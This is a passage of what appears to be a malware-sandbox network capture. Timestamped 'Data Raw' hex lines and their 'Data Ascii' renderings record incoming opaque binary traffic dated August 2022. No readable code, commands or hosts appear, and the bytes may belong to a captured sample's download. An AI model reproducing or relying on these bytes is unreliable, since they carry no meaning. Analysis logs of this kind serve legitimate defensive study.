20 8b 91 aa a6 a0 b0 79 cf 5d 85 43 40 ff c7 Data Ascii: `"~e_jzMYP\$8H-P!=to vo[*1hq3Gwv=A{\|r>%j 1qZ=c/7Mjb8[{eYE%#>1VF_YReyj-SvEX? y]C@
2022-08-05 09:32:58 UTC	133	IN	Data Raw: 96 05 2c 73 9e 67 14 47 65 fb 4b 71 d8 7b 94 bc aa b2 7a 19 05 e4 e3 5d 10 98 a6 74 c6 25 a5 76 25 af 3c 8e 7d 2f eb fc 1e b9 83 f2 01 ff 1b a1 73 00 a2 1c 50 bb 9c 92 78 a8 c1 c3 bb 9a ae 3c 4f 5d 47 97 44 9e 01 37 36 73 72 88 b3 a5 d1 cc a9 d2 36 07 30 e6 52 18 9f 32 1b 03 a9 cb 7f 04 87 15 ea a6 64 2c 3c 4e 2d 9a 1f c1 dc c7 67 17 cf 3e 3b ec d5 94 d4 12 cc 9d 98 2a 9f bb 86 59 80 de 88 bf 94 02 1e 8d 0a a5 96 8b d2 60 51 6d 7f bb 06 a7 9e 93 e1 63 93 b7 d2 43 1b 73 9e 29 2a 70 b1 bb b0 68 a0 56 78 ec 4e 27 21 91 a1 ca 13 64 72 f2 c9 e7 07 2c 03 d6 43 c7 92 fe 32 ca ce 2d 09 45 55 2c 22 1f 03 38 f3 ee 66 bd cb 34 f3 08 2d ea 14 65 1a e6 c5 0c 22 15 33 ce e9 65 87 a4 86 bd d0 84 22 73 bd 01 10 09 27 2f c2 97 85 36 d7 b0 21 ba 5e 48 a6 79 ee a4 dd 99 f3 Data Ascii: ,sgGeKq{z]t%v%<}/sPx<O]GD76sr60R2d,<N-g>;Y`QmcCs)phVxN'!dr,C2-EU,"8f4-e"3e"s'/6!^Hy
2022-08-05 09:32:58 UTC	135	IN	Data Raw: 45 e1 66 05 a4 ae 70 94 71 a7 fc ff 47 f6 df 41 d6 da 51 21 97 27 24 af 00 15 35 a9 a8 87 83 e6 81 fb c0 45 b6 30 8d 77 ff 07 5e 2e ac 5c 51 d6 bd 16 9d 96 1f ef 69 34 5a bb 85 03 d2 28 cd 7b c9 2a ad 21 4b 71 e3 1d a5 d0 63 96 95 62 0e c0 23 1a a3 6a 49 16 d2 56 a6 45 2b 05 25 66 20 fb ee 40 ea e0 5b 58 1a 80 35 9c 9b cd 59 21 30 e6 28 28 db 81 77 c0 92 c5 16 e8 d9 ea 10 46 31 29 d8 d9 58 ed 7b 3f 4f ea 9c 5d bb 8c eb d4 be 54 15 a9 1a a1 41 c5 8b 1d ef 33 8c 3c db 24 6f da aa ba 35 ce 4b ec db db 6d 45 ef e0 39 76 49 2e 7b 1d 78 a1 d7 3c 69 5b da 41 65 4c 24 66 2f b3 d2 c9 33 a5 16 ad 3d f7 fe ad 1a 8e 56 ed 79 a6 69 ce c5 b1 54 02 6b 5d 0a aa 09 b3 11 d2 6d 32 ac e8 7f dc c6 5a 5d 8d 9f 6e 6c 9c e4 04 a6 07 98 40 c2 8c 36 a1 4b 60 49 88 b7 e1 d3 5f 97 Data Ascii: EfpqGAQ!'$5E0w^.\Qi4Z({*!Kqcb#jIVE+%f @[X5Y!0((wF1)X{?O]TA3<$o5KmE9vI.{x<i[AeL$f/3=VyiTk]m2Z]nl@6K`I_
2022-08-05 09:32:58 UTC	136	IN	Data Raw: 40 99 bf 8c 33 d8 44 7b d0 06 ba b3 18 3e 67 28 4f 1f a5 be a5 f4 40 25 27 b3 d2 88 a7 b3 77 da a7 0c c0 6d 3c b0 33 e5 e5 3f 81 d9 ad 79 b4 91 cc fc c3 f3 17 e6 bd 53 1c 43 ac b3 7f 75 e0 32 94 b5 67 67 c8 2b e1 18 96 7b 85 d7 2e 74 fd 55 a3 9b 41 24 95 88 10 26 13 e9 21 8c d6 60 e2 ea 7d 69 08 b5 0d 7f 95 44 f3 0f 3b d4 02 a0 86 42 b5 c6 ad ce 32 74 bf 36 2f d1 86 a4 e7 53 50 5f 0d 34 7d 08 38 81 86 2e 2a f4 2b 6c ec ba 3a 53 d1 af 59 57 f3 0b 9e 84 7c 0d 85 7b 54 51 c3 d4 96 9e 67 5e 74 fe 13 3a 71 09 0d eb 4e ca ec 85 85 da bd 69 c1 03 b9 95 12 57 9e 4f 80 9b 13 fd dd 68 3a 5a 9c f1 ad ac b9 ab 91 0e fe 6d d4 5b 85 c7 5f 1f 50 ed 01 81 76 4b 78 8a fd ae cf 3a 61 da 67 79 fc 18 b9 67 42 7d 10 1d a1 90 d2 b5 a9 c0 aa 0f 81 be de 81 25 16 fb 7d 37 17 f8 Data Ascii: @3D{>g(O@%'wm<3?ySCu2gg+{.tUA$&!`}iD;B2t6/SP_4}8.*+l:SYW\|{TQg^t:qNiWOh:Zm[_PvKx:agygB}%}7
2022-08-05 09:32:58 UTC	137	IN	Data Raw: dc 26 06 9c c4 96 5d 0c c3 0e f7 64 eb d6 e4 30 97 c2 08 23 28 6d 68 2c 43 3f 5f 3e a9 9d a1 34 9e 2e 6f e4 a3 ee 72 bb bf 50 fe 08 0d 95 c5 09 69 76 00 da 11 3d 8d 69 da 8d d5 06 5a 13 27 6e 81 5e 40 ef 95 b4 6b 50 79 74 1a 4b c9 11 d8 de 88 aa aa 72 61 d3 6f 97 26 ad 90 2e 3c 60 b0 bd 37 0b a8 ec 65 0e 62 7b 1c 59 f8 38 7e ed 22 04 3b 4a b4 c3 5c e4 95 b9 10 db b8 23 ea d4 24 18 9d 64 65 60 26 29 bb 13 3f 1c e2 8f 50 8e 79 eb a1 f0 9d 5a 2d 26 aa 2e b5 d6 40 d1 8f 2a 21 9f 7b 32 f4 ba a7 77 64 c5 ba 01 ba 9e ea 31 c4 64 89 b5 28 9c 26 73 6d b3 1c b3 21 74 13 67 c3 ef 3d e1 e3 67 5f 3a dd af c6 26 2d ae 25 eb 42 cf cb d5 c7 7f fb 29 3e fa 95 95 bc 45 fc 4a 57 ba 9e cc f4 46 66 fe ac b3 fa 31 87 b3 08 41 fd ee c8 78 0a 10 27 d5 3a eb a5 a9 2f f2 e0 a4 a6 Data Ascii: &]d0#(mh,C?_>4.orPiv=iZ'n^@kPytKrao&.<`7eb{Y8~";J\#$de`&)?PyZ-&.@*!{2wd1d(&sm!tg=g_:&-%B)>EJWFf1Ax':/
2022-08-05 09:32:58 UTC	139	IN	Data Raw: 6d c9 5c dc 7d 26 c8 de 94 76 9f 9c 89 59 b4 c9 2d 18 45 ed aa 1d 8b 88 fd 51 c6 ce fa c7 a3 76 a7 79 35 cc 62 e8 46 6b 49 07 2c f5 38 c8 e9 c3 46 c2 2d 58 73 b5 e1 0f bc 97 ad 0c 1e 38 59 62 51 b3 c3 cb f6 8f 06 6f 9e 4f ce 86 d9 5e 2c 2f c7 6d a5 5b 4c 10 8e f0 58 c9 a4 4c 6e c6 59 c0 56 ed 0f 11 18 c8 02 45 51 49 36 f2 91 83 23 8b f8 04 81 ce 14 a2 9b 94 5a ac 9e 50 3e 55 83 81 f0 02 fe 86 5d 49 11 ae 4a ed 6f b7 13 72 34 07 4e 29 a2 4c 5e b6 ba 4f 50 72 62 3d c5 1b 70 d3 0d ee 51 6f 77 d9 5d 3d 9b b2 d3 76 fa 81 37 33 e2 7b ae 82 02 bd 40 ec 82 47 f0 75 6b be eb b8 7d 21 2b 96 b6 27 65 44 5a df b4 66 31 e7 cf b5 03 48 e1 8b cd 4c 4f bf b3 62 7f 19 64 6f f5 06 69 65 6e 50 d5 68 ab 9f f8 0d b4 20 58 91 e3 9d 76 64 d0 a2 a4 f6 56 43 04 b4 3c 77 b8 69 7b Data Ascii: m\}&vY-EQvy5bFkI,8F-Xs8YbQoO^,/m[LXLnYVEQI6#ZP>U]IJor4N)L^OPrb=pQow]=v73{@Guk}!+'eDZf1HLObdoienPh XvdVC<wi{
2022-08-05 09:32:58 UTC	140	IN	Data Raw: 0b 9e 18 27 86 52 5e b1 9a cf d8 7c 9f 5b eb d1 a8 36 be 9b a7 35 5c 44 c8 cf c7 05 82 b6 be ad c4 e2 f1 9b 3d cf dc 20 67 0b 31 60 a7 df d3 32 a7 05 ec 3c 56 8f fa cd 96 3f 9e 8c c9 19 cf f4 9b 01 2e 5f ac db 72 eb f2 e6 49 f0 18 b9 b0 3a 95 bc f2 ad 50 69 37 4c dc 67 6d 41 81 3a 16 84 91 3a fb ac 56 7e 57 9e ca 6d ee 40 4d 92 cb c1 a4 38 4d 08 86 2c c8 bf 17 d9 db f9 13 d7 b3 8d f2 45 48 f2 47 3d f3 0b 03 8f fd d6 59 82 c8 cf 56 4f c2 cb 33 c2 b5 0f 9c 50 71 05 8f c1 cd 57 9b 2b 45 d6 91 44 4d 53 65 bb e1 12 1b cd b9 06 55 18 3d ce 98 20 b9 0b 07 94 e1 29 95 8d 32 07 e4 cb eb 99 78 13 38 f3 83 6a 94 e7 07 8d 74 9c 87 ef cb 91 71 6d cf 78 68 e6 15 22 93 82 5c 15 d8 97 1b f5 f5 8b 1f e1 9d 03 15 34 8e 4c 2c cf f7 83 df e3 93 e2 a5 d9 69 2e 6a 96 a9 af ad Data Ascii: 'R^\|[65\D= g1`2<V?._rI:Pi7LgmA::V~Wm@M8M,EHG=YVO3PqW+EDMSeU= )2x8jtqmxh"\4L,i.j
2022-08-05 09:32:58 UTC	141	IN	Data Raw: 1e 66 70 34 3c 97 f4 e2 d4 10 52 20 37 e3 dc 60 e8 0b 68 e0 44 7f d2 21 b6 ed 47 91 ed 9f 66 14 b0 dd e6 f1 35 85 35 98 ff 71 c4 71 c9 b7 89 81 2b 9a d2 ee 41 b1 17 16 5c 7f 76 2e 2a 34 60 9e bf 61 37 d3 90 43 33 2a 5f 6b d6 22 8e 14 55 7d 1d 8f 91 c1 f6 b6 2c a4 c6 83 e4 3a fc cf 0a a3 03 9d ce ec c5 16 0c e8 39 15 b3 ff f6 19 f0 84 87 85 30 52 31 48 5c 66 ce ae 55 05 cc f1 99 9b 23 33 65 24 a4 d7 cf bb 5d e5 9d 0b 29 83 3b 7d 19 36 54 be 59 7f b8 ff b3 1e 3b 77 79 07 83 c2 ac c0 23 52 5a 20 2c 28 de 4c 85 bd 59 ac 61 6b e9 93 45 f6 c4 40 06 e1 50 84 ec 0f 04 c2 07 76 4e 07 f4 ac 26 b8 58 c2 71 95 50 70 f2 88 89 9b 61 a1 dc 30 78 98 51 ab c7 c2 1f 93 ba dc fb 4a 63 fb 4e 58 b1 cf 9b 51 fd ae e0 72 ca 69 8d 84 ac 51 cc 1c 7d 41 ab 05 e9 71 7c a4 8d a3 f0 Data Ascii: fp4<R 7`hD!Gf55qq+A\v.4`a7C3_k"U},:90R1H\fU#3e$]);}6TY;wy#RZ ,(LYakE@PvN&XqPpa0xQJcNXQriQ}Aq\|
2022-08-05 09:32:58 UTC	142	IN	Data Raw: 1f 26 e9 14 25 c6 41 f1 34 ea 9c b8 68 00 f4 99 1e 52 05 4b 91 f9 3d 84 8a 4d ad f4 d5 da 97 cb 94 ac f4 6c ae 76 21 4e 39 02 ec 2c ca 32 88 1c c9 8d 29 4c 73 5f 65 19 ec 1b 47 2d 43 94 8a 39 05 46 a0 ca 0c 29 35 82 91 2b cd 5e 9e 80 31 78 7f e6 cd 77 28 e9 d8 a7 80 bb 45 a8 5f ca 1a c6 49 93 c9 5a ea a3 8f d2 a3 3f d9 a4 60 07 9f d9 81 cc 9c 74 35 af c9 72 d8 3d 1b 5f bf 29 d6 cd 41 61 2b db bb 23 eb 8d 63 1d ae 65 93 3a 20 cd 1d e6 1d 9c fa 31 c3 58 bb 80 53 32 40 f2 2b 7d 39 72 05 a8 4c 34 d0 31 a8 2a 7e 54 64 8c b1 61 b3 aa 1b 36 ab 12 73 14 7e c0 36 d9 4f c4 8b f7 8b 7c 47 f8 31 e5 13 11 bf fd a2 c1 8c 54 0d fe 04 16 d7 75 8d 00 14 a9 a4 d6 23 76 81 11 a1 1c b9 4c 84 6d 01 54 36 6f bd d3 90 68 ab 3e 6e c4 bd 43 51 a6 36 df 6d a4 ff ac bf 77 e4 44 09 Data Ascii: &%A4hRK=Mlv!N9,2)Ls_eG-C9F)5+^1xw(E_IZ?`t5r=_)Aa+#ce: 1XS2@+}9rL41*~Tda6s~6O\|G1Tu#vLmT6oh>nCQ6mwD
2022-08-05 09:32:58 UTC	144	IN	Data Raw: dc ac 01 3b c9 9e f0 3a 8a 83 03 f0 75 8a b1 81 c8 87 88 ab 51 19 ce 26 6a 60 5c ad 3f af a2 77 38 1d f2 7b 17 14 95 09 98 17 32 56 f6 2f 16 69 5a 2c 91 d0 e9 00 07 51 94 de 9d d4 b6 5a fb b8 18 32 bb ae 0c 66 fc 5b e3 7f 6c a9 b9 c0 7a d6 b1 98 a3 0b 6b 1f ae ec 0d b2 59 aa b7 cc fe 0e df 7e 11 89 13 db b4 b8 a3 47 12 00 c1 a5 e0 8a 02 be 1b bf df 67 fa 8c f8 91 3f ef c1 5a 3d b5 db 35 66 13 91 29 cd 4f 42 7e 60 36 e5 f3 41 d9 51 16 02 57 2b 42 af 6f 6e bc a0 6c 07 87 c1 98 ac f3 74 1d 79 63 1d 4e b8 2a 5a 8e ca 6a ef 34 13 43 35 74 96 da c1 92 45 32 e9 de 7d 6c 1c f1 42 ee a6 29 a1 54 30 c5 6d 81 3b 66 ae 1a 1a 8d 33 9f 4d d6 d2 57 eb c3 4e 57 32 04 a3 2b e1 1b 3f a5 c8 c6 ae 96 34 d6 72 b3 eb 8f 03 a7 f3 b4 5a e4 78 2a b4 5f ff 91 74 a4 30 d4 fd c2 67 Data Ascii: ;:uQ&j`\?w8{2V/iZ,QZ2f[lzkY~Gg?Z=5f)OB~`6AQW+BonltycNZj4C5tE2}lB)T0m;f3MWNW2+?4rZx_t0g
2022-08-05 09:32:58 UTC	145	IN	Data Raw: 7d 04 c2 e4 cf 1b 5d 26 a1 d5 71 e9 74 0e c7 0d 81 54 7e 36 5e de 0d 01 16 e0 59 96 60 3d 6f 4c 43 61 ea 35 04 c3 13 4b 4e 39 94 23 94 09 73 e5 4e 75 5d e3 b3 cc b9 20 2f 15 36 fc 16 3d 29 02 93 54 0e 7a b6 27 85 3e e1 f2 d4 8f 1f 03 0d 39 36 e4 18 97 dc 53 2b a6 3a 7f e0 86 e5 81 93 da c7 28 ca b8 90 c4 23 b7 3a 0f 3b 33 2c e5 9b cc 39 e8 fc 9e c6 61 48 46 47 3f fc 7d 4d 09 dd 24 b4 ee ee 94 69 32 5f 36 b0 13 9a d9 c0 78 81 fc 55 91 f1 55 87 7b 4e 17 29 8a 36 40 b5 08 9a ff c4 b9 1f 23 5e e2 43 ba 30 54 60 b2 a0 1d 22 5e d7 30 79 e6 77 d5 93 41 9a 3f 77 29 3a 67 dd 3d be 3e 74 d9 6d 58 6f ad 48 46 b7 57 bb 73 46 43 1c 29 a1 16 95 6c 59 56 39 f4 6e 70 4e 6f 4a f5 04 ca 8f 8f 36 db 73 c4 d3 6e 91 d6 e2 86 43 d3 99 19 6c 55 5b d7 dc b5 f2 a1 52 46 d2 30 4d Data Ascii: }]&qtT~6^Y`=oLCa5KN9#sNu] /6=)Tz'>96S+:(#:;3,9aHFG?}M$i2_6xUU{N)6@#^C0T`"^0ywA?w):g=>tmXoHFWsFC)lYV9npNoJ6snClU[RF0M
2022-08-05 09:32:58 UTC	146	IN	Data Raw: 81 87 5f b7 51 57 16 0d 9c 9e 03 d9 56 91 d3 d0 60 33 dc 03 c8 7a 2b 69 81 fa 89 79 26 2b 5b 92 4e 16 07 d2 3e d2 05 18 6a 41 16 39 19 2c a3 bd f2 af 55 4e 8b 7f 40 b5 b5 fd c8 9d 76 5d a2 15 92 3e bc 9f 63 4d 28 18 e8 ee fe 4f cb a1 7d e8 c1 2f d3 10 f0 5b 94 16 12 b8 4e ac 15 6b 6b 1f e2 6e ae a1 0d 4c 2b 0f 26 f6 db f3 06 6f 08 3f 00 c7 56 50 3c c5 55 6e 6a 56 68 1f f8 8a f3 7b 40 3e 07 6e 9b 5a f5 92 48 19 dd f1 8c e6 0b bb f1 8a bd 58 6d 9b db db d8 dc d1 9f 30 2a 79 c7 13 53 31 86 3f 70 70 21 be a4 91 56 e5 4f 7b 00 db 00 86 9e 9a bf 42 84 1e d2 72 01 b9 30 68 0c 44 e1 8a a1 e0 92 a8 1b 88 77 c0 56 9b 5f 62 80 7d e9 eb 46 8e 45 a5 d7 67 cc 6d a7 be 50 22 89 dd bc b0 b7 23 fc 6e 4f f4 de fe f3 97 fe a8 75 45 20 87 a0 a1 05 4e 57 77 d0 c7 22 08 6e 50 Data Ascii: _QWV`3z+iy&+[N>jA9,UN@v]>cM(O}/[NkknL+&o?VP<UnjVh{@>nZHXm0*yS1?pp!VO{Br0hDwV_b}FEgmP"#nOuE NWw"nP
2022-08-05 09:32:58 UTC	147	IN	Data Raw: 44 fe 45 71 99 e4 19 09 4c 34 e0 b4 7d c8 06 0b 83 2b c3 20 a5 c5 fe 49 c1 32 3d ed 8e 04 6a 22 eb 4c a0 80 33 18 ca e5 aa 09 0d 64 69 9b cc 42 2f 1f 36 15 d0 be e8 0d 8a 09 9d 2e 81 1e bf bd 28 0a fc e3 6c 04 ad 84 79 8c e3 8e e0 96 34 80 0e 32 51 dd 3e 48 ee e4 3f f4 1d 10 e4 42 54 3b 63 b9 e2 0b 4a 52 ba 83 33 34 7a 70 73 69 9a 0a 40 a1 cf 92 be 95 13 39 0d ca 26 21 4f c6 94 72 13 3f 0f 7f e9 cf 1c b1 38 c0 7e b9 b1 3b 05 88 67 60 59 be 86 8f f6 0b 86 ca 41 dc 4a cc 20 c1 cf ed 49 f9 2b 4f 8f 83 fb b6 bc 58 98 6f fe a7 14 c1 24 b9 1c 95 43 d3 20 6e fe 67 c6 c7 23 91 ed 5d f4 78 1f d2 5a ff fe a7 7d 7b 07 66 53 16 8c eb 9f 6d af 01 65 b8 d9 2a dd bc 25 3a 80 97 50 1d 14 b3 ca 82 d2 9e 9a 57 aa 1a aa 77 b8 ed 39 49 3d 12 9e 28 88 f0 bd f8 20 88 70 8b 72 Data Ascii: DEqL4}+ I2=j"L3diB/6.(ly42Q>H?BT;cJR34zpsi@9&!Or?8~;g`YAJ I+OXo$C ng#]xZ}{fSme*%:PWw9I=( pr
2022-08-05 09:32:58 UTC	148	IN	Data Raw: 47 d8 83 6a 5d 9e 93 41 c1 bc 12 fe 72 26 76 66 2b e8 6c b4 d4 6e eb ca e4 b9 a6 ae 6a a9 c2 5d 43 e4 32 20 01 94 3d 12 50 f9 5d ea fc 38 9d 83 b6 70 c7 b1 7a fb 97 3a e4 c5 31 b2 d2 5a 5d fb b9 ae 69 d3 9c 29 5b d6 fa 83 be 6b 97 f8 99 19 3c c8 19 72 90 61 95 7a b9 d4 58 5f 98 48 df 43 28 4d 9d ab 99 93 e3 d1 48 f8 e8 8b 72 1c fb 89 04 10 d2 81 22 c1 a9 17 a1 53 75 47 ec 56 a5 8b b3 62 95 c3 2a e3 44 cb 5c e4 16 15 5c 83 f3 ba 8b 77 00 4e c8 50 05 6a 16 24 e6 fc 7f f6 df 7f 94 b8 37 6a 8f 62 5b ee fe eb b4 b1 28 00 d1 9d 5e 63 29 53 a2 8f dd 53 11 34 13 fd 55 45 bf 58 92 51 5c b4 d6 03 40 ab 4d 07 5b f4 c7 83 a6 9d bf 7f b5 b6 a3 5e 0c c3 b2 87 e3 23 39 a6 8b cf 4c 0f 9e 50 41 43 e0 58 b6 d7 f9 3f cc 66 51 cc f6 3f b9 d2 31 ea 2a f3 59 93 7a c5 a3 4e 1d Data Ascii: Gj]Ar&vf+lnj]C2 =P]8pz:1Z]i)[k<razX_HC(MHr"SuGVbD\\wNPj$7jb[(^c)SS4UEXQ\@M[^#9LPACX?fQ?1YzN
2022-08-05 09:32:58 UTC	149	IN	Data Raw: e0 19 c1 bc 8d d1 c0 69 6a 6e f9 07 8b 76 32 ef 47 d7 84 d2 9f 7e f0 e1 59 b7 01 68 8d 1f 39 bf 47 33 c7 c9 2f 48 c7 31 38 07 b8 6a f6 27 b5 4b 48 76 af a0 26 b8 7d 2a c8 e6 5b 85 80 28 35 af 54 ec 67 83 53 e7 06 d3 7d 53 73 c2 b5 1f de 91 03 e6 59 ed cf 42 6f a5 cd 67 9c a6 37 76 21 cf f0 6c c9 26 4c 39 2b dc 42 1b cd 4a 1f 41 98 6d ae 57 ab e4 f2 9e b9 52 f4 fe 6d f8 e6 c2 cb 4f 9f 60 0a ad 19 f6 4c dd 0f 5a b2 59 c0 2f 5b a6 94 99 35 c0 12 e7 fe 49 74 03 1d ae 7d 7b 00 8c db 56 dc af c6 9b 32 89 1d d4 5a cf ef 0f 15 5e 46 28 28 61 df e1 e9 00 13 1f 85 dc 59 4e b3 eb 6e d5 71 d8 e8 74 45 fa 09 1c 1f 72 f1 8d 01 a3 ef a2 90 62 af 56 b0 d6 c9 06 85 6c 8a b3 7e 1a 2f f5 db 6b 50 65 de 49 b2 a5 80 12 7d f6 ee f0 81 6d b6 29 e2 88 ef 5f bf 2d 98 d1 6a dc f7 Data Ascii: ijnv2G~Yh9G3/H18j'KHv&}*[(5TgS}SsYBog7v!l&L9+BJAmWRmO`LZY/[5It}{V2Z^F((aYNnqtErbVl~/kPeI}m)_-j
2022-08-05 09:32:58 UTC	151	IN	Data Raw: dd 8f 63 27 e8 33 7f dd 1d d5 f7 5e 01 e7 8a 1a 6c e5 9f 74 07 65 12 ce 48 e3 6b 0d 78 c4 5c 68 cf da ad b3 52 5c ea f3 d8 d6 ef 17 06 f4 b4 2b 3a 92 0a ca 41 91 a8 0c f5 d8 0a 2f 2a 8a fa 68 c9 db f5 b3 50 df 63 fb c8 e3 a8 ba a3 8d 2c 5e 3c 41 4a cf d8 9f 1c cc 8d 37 67 27 69 50 3a e9 c1 54 db d4 38 bf 9d 9c 4e f3 b7 91 37 a5 03 94 78 54 a6 c7 58 a5 b2 1b cc 35 6d 7b c6 5c 6f c6 33 12 9f b4 15 b4 6e 5d cc d5 67 4f 7e 23 01 c2 75 b3 20 e2 af 5a 2c 16 9a a7 07 a3 8c ce 94 4a d1 a7 ae a4 19 92 87 63 94 ca 1e 69 e7 67 37 d6 68 54 46 d2 4b e6 ee d6 fb c0 e3 ef 31 48 58 1c a7 53 fb 7d 12 4f 0d 22 80 e6 57 4d db f4 17 79 c1 bd ac 14 31 7a 6d b1 3a 16 1f 21 84 f5 db 37 3a fe 7f 4e fd a2 49 64 1c 53 a3 20 87 59 ad 99 02 2f 89 f1 3c 63 1e 3c ae 70 b3 6c 09 8b 73 Data Ascii: c'3^lteHkx\hR\+:A/*hPc,^<AJ7g'iP:T8N7xTX5m{\o3n]gO~#u Z,Jcig7hTFK1HXS}O"WMy1zm:!7:NIdS Y/<c<pls
2022-08-05 09:32:58 UTC	152	IN	Data Raw: 9d f3 ec 27 3d 11 52 7a b2 1a e2 8e 70 d1 d8 44 74 52 e8 a5 11 e9 3c 59 6c 99 aa f9 03 9b 27 36 99 15 58 f3 c9 e0 7b 55 5e 84 e0 ec 07 a5 37 f9 63 51 2b f3 3d 71 c2 31 34 b1 57 0c ee 4f f3 40 f8 b8 ac 81 20 82 26 a3 f8 89 fa 49 14 e9 bb 91 83 7e d0 71 15 31 25 af ac 63 58 de e6 e1 71 c4 6b dd 17 3e 0f ac 44 a2 5d 17 9e d8 fb 84 48 ee af d0 68 b8 09 0e 24 1a 6b 3f 93 91 df f5 dc 07 25 34 c1 5e ef a8 44 56 1b 18 0b e6 9b 7f 00 4e 40 4a fe 1b b9 f6 df 00 77 42 76 ae ac d0 fe e4 89 e4 16 09 5c ee f1 5a 39 2f d6 24 cc f8 3e df 8d 4f 90 fe 0e 64 b6 72 4d 71 f7 16 78 49 b8 56 aa ce 01 00 ca 92 37 d9 c0 4a c9 94 86 6e c7 58 69 c8 b3 08 6d 60 fb 09 5a cd 38 75 a9 b8 91 11 58 de 7d 9c 0f be d7 cc bf 04 42 00 b9 41 87 d5 94 8a e8 03 9e e8 dc 1d d9 54 fe af 78 11 7c Data Ascii: '=RzpDtR<Yl'6X{U^7cQ+=q14WO@ &I~q1%cXqk>D]Hh$k?%4^DVN@JwBv\Z9/$>OdrMqxIV7JnXim`Z8uX}BATx\|
2022-08-05 09:32:58 UTC	153	IN	Data Raw: 66 67 f5 59 12 2e 16 29 8c d0 36 06 38 dd 80 1a 3d a5 d2 d6 2a 17 04 2f 0d 07 a8 6a 13 93 f9 9c e0 15 00 84 20 e6 64 73 bd c1 28 50 9b 44 3e 0d d5 6d 73 80 68 33 12 fc 49 b6 b4 8b ab 7a e7 90 3c 62 3b ab 7c 63 5b 92 3d af e2 97 cf c8 5d 3d 02 26 3d ff 08 ae ef e9 7b 1c d6 70 e8 22 20 2f 45 2c 3a eb 38 e3 52 90 41 9e 85 a5 42 7b f5 de e5 32 58 55 a3 72 b3 53 3a 40 ae 3f 66 87 ea 2b a3 cd fb d5 1c 21 f8 96 e6 05 1d ad c2 a2 4b 22 35 a4 47 b8 4f b1 ab 0f 2c ca 33 b5 8d 9b a4 68 3f 90 d1 0c 64 cc d5 fb de b9 b2 a3 05 72 e9 b0 3e 2a e5 6c 53 ec e0 1b 16 e5 7b 12 a5 22 a6 c6 90 b8 a2 5c 1a 67 a0 b5 78 ab bc 50 27 b3 4e 02 6b 24 c5 f2 84 21 9b 28 a9 6d d4 62 6c 58 9e 30 8f 39 c4 8a ce 17 bb 5c 8e 55 7f d9 ea 53 37 55 a0 15 55 28 d9 e5 ef 73 ab 34 89 f7 8a 37 fa Data Ascii: fgY.)68=/j ds(PD>msh3Iz<b;\|c[=]=&={p" /E,:8RAB{2XUrS:@?f+!K"5GO,3h?dr>lS{"\gxP'Nk$!(mblX09\US7UU(s47
2022-08-05 09:32:58 UTC	155	IN	Data Raw: 55 d6 0d f6 15 7a 1d 14 ab ba 6f e1 69 21 f0 1f ad a9 e6 d3 a9 b7 8e 02 69 91 18 cf 7d 9c e3 db 2c f8 3b a0 2a 69 e8 49 3c df c2 93 e8 ab 83 e9 52 1f 73 fc 8a d0 cf db 8e 02 d3 20 d7 6d 43 92 8f 61 99 15 f8 c5 7f b4 5a 10 5c 54 56 d1 66 81 a9 1c 96 47 fd 7c f5 18 7b ff 3d f3 71 a3 19 5e 14 37 12 b5 c0 1c f6 16 26 e3 9b 77 14 8a 27 49 ba b9 9f 0a 97 b1 4d d6 48 df 72 3b 1d 2e 03 33 cb 64 3e 83 67 e3 b4 84 c9 3e 58 d3 71 53 17 9f 54 e2 95 69 4a 7f fc 0a 4d d2 e8 80 db c1 99 43 69 a8 9b bf 6e 18 35 9a cc 00 5d a5 4a 25 f5 c2 dd a6 4c 50 24 13 1a a3 4b 82 f7 c4 81 dd f6 b7 1e 79 03 98 47 bc b0 03 1b 0a fa 6e f4 87 86 dd fe 6c 9c 86 96 ed 8a 8e 7a 23 c9 c2 56 c0 92 ab 4a 9c dd 4b 8e 60 09 5d ac 7a aa 7c 2c dc 2d 45 1b 3d 91 65 45 0b 25 bf 3b fb 58 f0 6d 02 51 Data Ascii: Uzoi!i},;*iI<Rs mCaZ\TVfG\|{=q^7&w'IMHr;.3d>g>XqSTiJMCin5]J%LP$KyGnlz#VJK`]z\|,-E=eE%;XmQ
2022-08-05 09:32:58 UTC	156	IN	Data Raw: 88 8b a3 90 8f ea 58 5c 3b 78 85 b0 dc 3e 11 4a 77 c2 c2 68 f7 a2 76 0f 0c 7b 0d 25 a4 d2 1e 08 33 37 3c 94 69 32 7b fc bf 02 f2 c7 87 4c ea 6e 3f 82 d7 23 5a 0c 36 f0 36 56 f8 7c dc f7 63 f6 c6 ec 88 7a 81 4f 30 ac 91 70 53 67 57 b0 f5 6a 25 74 5e e6 48 e9 4e 5f a2 4d 18 4d a6 54 73 22 78 17 73 a2 51 a0 04 44 19 ea 28 8f 8f d1 8e b3 bf 46 5e 63 80 91 19 72 a0 b3 b2 46 ea ef 16 76 1d 27 22 24 ba 16 cb 84 f3 69 19 02 62 ba aa f1 d3 a0 2b 48 ae 6e b0 7d 94 68 2c b7 59 b0 9d 4c ed f3 92 8f fd 05 8c b6 d9 af 66 3c d7 57 bb b8 39 b6 7c 7b b7 20 c9 08 3b dc 4e 0f 83 a7 59 02 6c 57 13 6f 16 04 dd 35 97 93 71 ce 56 4b ed 2a 49 e2 95 cf 98 fe 6d 87 82 89 4e 18 1d 9a 61 0c 31 46 9d 71 04 96 e3 9f 70 ff 8b 62 08 39 46 ab eb ec 2d 23 f4 8e 93 f9 22 cb c6 5c 39 7a 6d Data Ascii: X\;x>Jwhv{%37<i2{Ln?#Z66V\|czO0pSgWj%t^HN_MMTs"xsQD(F^crFv'"$ib+Hn}h,YLf<W9\|{ ;NYlWo5qVK*ImNa1Fqpb9F-#"\9zm
2022-08-05 09:32:58 UTC	157	IN	Data Raw: 19 c9 ba 2b 10 55 48 bd 35 d6 9c 44 b5 b1 8a 3f 65 0d 9c 6a 8d 0a cc 0d 03 4b 75 ed da 15 ee af b2 ff 52 37 86 a1 4f 70 34 a3 a4 59 02 0d ec f8 74 bb 79 1e e8 d5 fd a6 c1 54 03 5c 55 65 7d 4e a3 c4 e3 5d 84 de dc 0f 64 63 24 3b 16 ad fa b0 49 62 58 40 bf bc 51 9b 18 83 17 4d a4 54 79 c4 15 22 78 31 63 3e 4e 50 6e a9 8c 98 ff 20 53 41 6e 90 ba 05 82 81 48 b1 bd 13 48 38 fd e1 aa 88 70 25 53 9f ae 4f 85 0a d1 6a 7e 62 b8 52 18 21 31 5e 3c 92 b2 5c 03 46 9e 4b 7c 82 f8 0b ba 69 72 b6 cc 5c 1e a1 7c c5 6b d4 81 be f9 c4 44 08 37 3c 5c 7a 46 40 4c 2a d0 89 c1 f0 a2 b4 58 a2 85 6a 4e 21 5a 9e 61 66 2b 73 4a 41 bc 8e 3e 0a 61 fe 